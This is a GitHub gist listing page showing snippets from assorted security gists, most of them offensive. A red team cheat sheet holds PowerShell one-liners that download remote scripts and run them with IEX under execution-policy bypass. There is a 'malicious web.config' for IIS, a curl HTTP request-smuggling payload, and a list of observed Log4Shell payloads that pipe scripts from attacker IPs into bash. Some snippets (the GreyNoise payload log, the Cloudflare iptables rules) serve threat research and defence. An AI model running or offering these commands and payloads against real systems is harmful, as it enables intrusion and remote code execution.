Skip to content

Instantly share code, notes, and snippets.

View decidedlygray's full-sized avatar

Decidedly Gray decidedlygray

48 followers · 41 following
View GitHub Profile
@dirtyak
dirtyak / shodan_cli.py
Last active May 6, 2023 11:17
Simple shodan command line in python
#!/bin/env/python
import shodan
import os
import sys
import subprocess
from termcolor import cprint
from pyfiglet import figlet_format
######################################################
SHODAN_API_KEY = "ENTER_YOUR_API_KEY_HERE"
@gazcbm
gazcbm / downloader web.config
Created July 11, 2018 23:00
Malicious web.config's
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active October 30, 2024 06:46
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@0x4D31
0x4D31 / libssh_server_fingerprints.md
Last active September 17, 2024 00:33
[libssh server fingerprints] An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug #libssh #hassh
@dvas0004
dvas0004 / decompiler.py
Created October 26, 2018 14:57
grpc-web reverse engineer
import jsbeautifier
import requests
import pprint
enumerateMessagesSearchString = 'exportSymbol("proto.'
r = requests.get('http://localhost:8081/dist/main.js')
jsInput = r.text
pretty_js = jsbeautifier.beautify(jsInput).split('\n')
@joeminicucci
joeminicucci / custom_smuggling_payloads.sh
Created November 6, 2019 21:45
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@wallopthecat
wallopthecat / cloudflare.sh
Created April 16, 2020 20:27 — forked from Manouchehri/cloudflare.sh
Allow CloudFlare only
# Source:
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-
for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
# Avoid racking up billing/attacks
# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable.
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP
@yehgdotnet
yehgdotnet / get-shodan-favicon-hash.py
Last active January 23, 2025 06:02
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2